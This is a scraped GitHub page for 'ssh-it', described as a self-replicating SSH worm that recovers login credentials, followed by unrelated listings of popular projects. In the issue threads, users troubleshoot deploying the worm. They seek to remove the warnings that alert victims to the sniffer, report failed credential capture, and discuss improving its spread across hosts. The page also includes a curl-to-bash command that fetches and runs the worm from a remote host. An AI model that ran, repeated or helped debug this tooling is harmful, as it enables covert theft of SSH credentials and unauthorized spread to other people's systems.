hackerschoice / ssh-it Goto Github PK
View Code? Open in Web Editor NEWSelf replicating and automatically spreading SSH worm that recovers login credentials
Self replicating and automatically spreading SSH worm that recovers login credentials
leonardo
for start when I install ssh-it even using THC_NO_CONDOME=1
it sets env vars for debugging, which shows the user doing ssh that a sniffer is installed
I have to manually edit the seed file each time
from docs: THC_NO_CONDOME=1 -- Take off all safety and run SSH-IT in release mode (with no warnings)
but it doesn't work, the warnings still appear
Hello.
I'm running a stock Fedora 36 system as a SSH client and as a SSH server (with SELinux enforced and permissive, it's the same)
When I start an standard password-based SSH session, I run some random commands and I exit, however, thc_list -r list shows "No logins captured" and there's no ".l" folder created. Moreover, it hasn't autorreplicated on the server. So, basically, it hasn't done anything.
Thanks a lot!
PD: Doing export THC_DEBUG=1 before executing the SSH client doesn't show anything different from not doing it
User reported that 'it fails' if ~/.config
does not exists.
A picture is worth a thousand words
With THC_DEBUG=1, a regular SSH session looks like this:
I don't know if this issue is related to citronneur/pamspy#6 but it's the same behaviour.
Thanks!
doing everything just in memory without even touching /dev/shm is tricky and loop-detection wont work when the ssh-path branches:
A -> A is detected
A -> B -> A is detected
A -> B -> B is detected
A -> B -> C
A -> C is NOT detected.
This is because the LOOP-DB is only available OUTSIDE the main for-loop.
Changing this to marking a file in /dev/shm would fix this and also simplify parallel execution to speed up the berserker.
THC_DEBUG=1 THC_NO_CONDOME=1 bash -c "$(curl -fsSL ssh-it.thc.org/x)"
DEBUG: THC_VERBOSE =
DEBUG: THC_TESTING =
DEBUG: THC_DEPTH = 6
DEBUG: THC_DEBUG = 1
DEBUG: THC_USELOCAL =
DEBUG: MY_TMPDIR = /tmp/.ssh-it-pkg-0
Downloading binaries........................................................[OK]
Unpacking binaries..........................................................[OK]
bash: line 237: ./hook.sh: Permission denied
DEBUG: Cleaning '/tmp/.ssh-it-pkg-0'
work around: prefix with MY_TMPDIR=/dev/shm
issue while installing ssh-it
-bash: xxd: command not found
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.